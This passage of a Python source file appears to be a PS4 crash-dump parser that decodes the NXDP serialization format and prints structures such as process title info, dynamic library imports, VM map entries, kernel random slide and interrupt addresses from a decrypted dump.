        s.title_id = o[0].decode('ascii').rstrip('\0')
        s.app_id = o[1]
        s.unk0 = o[2]
        s.unk1 = o[3]

    def __repr__(s):
        l = ['Title Info']
        l.append('  title id   %s' % (s.title_id))
        l.append('  app id     %x' % (s.app_id))
        l.append('  unk values %x%x' % (s.unk0, s.unk1))
        return '\n'.join(l)

class NxdpSceDynlibImports(NxdpObject):
    dynlib_import_t = Struct('dynlib_import',
        ULInt32('pid'),
        # IDT index
        ULInt32('handle'),
        ZeroPadding(8),
        # 0x10
        ZeroPadding(0x20),
        String('path', 0x400, encoding='ascii', padchar='\0'),
        ZeroPadding(8),
        Bytes('fingerprint', 0x14),
        # 0x44c
        ZeroPadding(4),
        ULInt32('refcount'),
        ULInt64('entrypoint'),
        ULInt64('dyl2_field_138'),
        # 0x464
        ULInt64('dyl2_field_140'),
        ULInt64('dyl2_field_148'),
        ULInt64('dyl2_field_158'),
        ULInt32('dyl2_field_150'),
        ULInt32('dyl2_field_160'),
        ULInt64('text_base'),
        ULInt64('text_size'),
        ULInt32('field_494'),
        # 0x498
        ULInt64('data_base'),
        ULInt64('data_size'),
        # 0x4a8
        ULInt32('dyl2_field_94'),
        # TODO there seems to be more nonzero stuff in here?
        Padding(0x6b4 - 0x4ac))

    def parse(s, o):
        # XXX this was added on later fw versions
        # seems to duplicate handle for some reason.
        s.idx = o[0]
        # same across versions
        s.info = s.dynlib_import_t.parse(o[1])

    def __repr__(s):
        l = ['Import Info']
        l.append('  id %x' % (s.idx))
        l.append(str(s.info))
        return '\n'.join(l)

class NxdpVmMap(NxdpObject):
    vm_map_t = Struct('vm_map',
        ULInt32('field_0'),
        ULInt64('start'),
        ULInt64('end'),
        ULInt64('field_14'),
        ULInt64('field_1c'),
        ULInt64('field_24'),
        ULInt32('prot'),
        ULInt32('field_30'),
        ULInt32('field_34'),
        String('name', 0x20, encoding='ascii', padchar='\0'),
        ULInt32('field_58'),
        ULInt32('field_5c'),
        # XXX this was added on later fw versions
        ULInt32('field_60'),
    )

    def parse(s, o):
        s.info = s.vm_map_t.parse(o[0])

    def __repr__(s):
        l = 'VM Map Entry: %16x - %16x%x%s' % (s.info.start, s.info.end, s.info.prot, s.info.name)
        return l

class NxdpKernelRandom(NxdpObject):
    def parse(s, o):
        s.seed = o[0]
        s.slide = o[1]

    def __repr__(s):
        l = ['Kernel Random Info']
        l.append('  seed  %s' % (binascii.hexlify(s.seed)))
        l.append('  slide %x' % (s.slide))
        return '\n'.join(l)

class NxdpInterruptInfo(NxdpObject):
    def parse(s, o):
        s.from_ip = o[0]
        s.to_ip = o[1]

    def __repr__(s):
        l = ['Last Interrupt IP Info']
        l.append('  from %x' % (s.from_ip))
        l.append('  to   %x' % (s.to_ip))
        return '\n'.join(l)

class NxdpParser:
    process_types = {
        0x21: NxdpProcessInfo,
        0x22: NxdpProcessThread,
    }
    type_parsers = {
        0x00: process_types,
        0x01: NxdpSceDynlibInfo,
        0x02: NxdpThreadInfo,
        # 0x03 is SCE ID table stuff...seems they removed it from later fw coredumps?
        0x04: NxdpSceDynlibImports,
        0x05: NxdpVmMap,
        0x10: NxdpKernelInfo,
        0x11: NxdpBuffer,
        0x21: NxdpKernelPanic,
        0x22: NxdpKernelTrapFrame,
        0x23: NxdpPcb,
        0x24: NxdpDumperInfo,
        0x25: NxdpKernelRandom,
        0x26: NxdpTitleInfo,
        0x27: NxdpInterruptInfo,
        0x28: NxdpKernelPanicLarge,
    }

    @staticmethod
    def parse(obj):
        try:
            f = NxdpParser.type_parsers[obj[0]]
            l = 1
            while isinstance(f, dict):
                f = f[obj[l]]
                l += 1
            return f(obj[l:])
        except KeyError:
            return NxdpObject(obj)

class NXDP:
    def __init__(s, buf):
        s.buf = buf
        s.nonce = s.buf.read(0x10)
        unpacked = s.decode()
        s.root_raw = unpacked
        s.parsed = []
        for i in unpacked:
            s.parsed.append(NxdpParser.parse(i))

    def read_byte(s):
        return struct.unpack('B', s.buf.read(1))[0]

    def decode(s):
        #print('decode @ %x' % (s.buf.tell()))
        # The idea is that everything eventually ends in leaf node which can be
        # represented as signed/unsigned integer, or a buffer.
        # Nodes consist of "uarray"s, which denote children, and
        # "array"s, which denote groups at the same level.
        b = s.read_byte()
        if b <= 0x7f:
            # unsigned immediate
            return b
        elif b == 0xc0:
            # next byte is immediate type
            b = s.read_byte()
            if b == 2:
                # boolean "true"
                return True
            elif b == 3:
                # boolean "false"
                return False
            elif b == 4:
                # uarray begin
                # push level
                items = []
                while True:
                    i = s.decode()
                    if i is None:
                        break
                    items.append(i)
                return items
            elif b == 5:
                # uarray end
                # pop level
                return None
            else:
                assert False
        elif b == 0xc1:
            # blob_rle
            return s.decode_blob_rle()
        id = b >> 4
        arg = b & 0xf
        if id == 0x9:
            # unsigned
            return s.decode_unsigned(arg)
        if id == 0xa:
            # array
            a = []
            for i in range(arg):
                a.append(s.decode())
            return a
        elif id == 0xb:
            # blob
            return s.decode_blob(arg)
        elif id == 0xd:
            # signed
            return s.decode_signed(arg)
        elif b >= 0xe1:
            # signed immediate
            return sign_extend(b, 8)
        else:
            assert False

    def decode_unsigned(s, n):
        x = 0
        for i in range(n, 0, -1):
            x |= s.read_byte() << ((i - 1) * 8)
        return x

    def decode_signed(s, n):
        u = s.decode_unsigned(n)
        # "sign-extend"...
        # This is normally used to encode kernel addresses,
        # so actually return unsigned...
        return (u | (0xffffffffffffffff << (n * 8))) & 0xffffffffffffffff

    def decode_blob(s, n):
        # n = 0 means length is encoded unsigned value
        if n == 0:
            n = s.decode()
        return s.buf.read(n)

    def decode_blob_rle(s):
        # decompressed size is stored first
        n = s.decode()
        # always starts with 0x97 which *doesn't* encode anything...
        assert s.read_byte() == 0x97
        # slow and simple
        blob = b''
        while len(blob) < n:
            b = s.buf.read(1)
            if b == b'\x97':
                count = s.read_byte()
                if count > 0:
                    b = s.buf.read(1) * count
            blob += b
        assert len(blob) == n
        return blob

    def dump(s):
        for i in s.parsed:
            print(i)

if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='PS4 crashdump parser')
    parser.add_argument('dump_path')
    parser.add_argument('-i', '--openpsid', type=lambda x: binascii.unhexlify(x))
    parser.add_argument('-k', '--keyset_id', type=lambda x: list(map(int, x.split('.'))))
    args = parser.parse_args()
    nxdp = NXDP(BytesIO(Decryptor(args.dump_path, args.openpsid, args.keyset_id).data))
    nxdp.dump()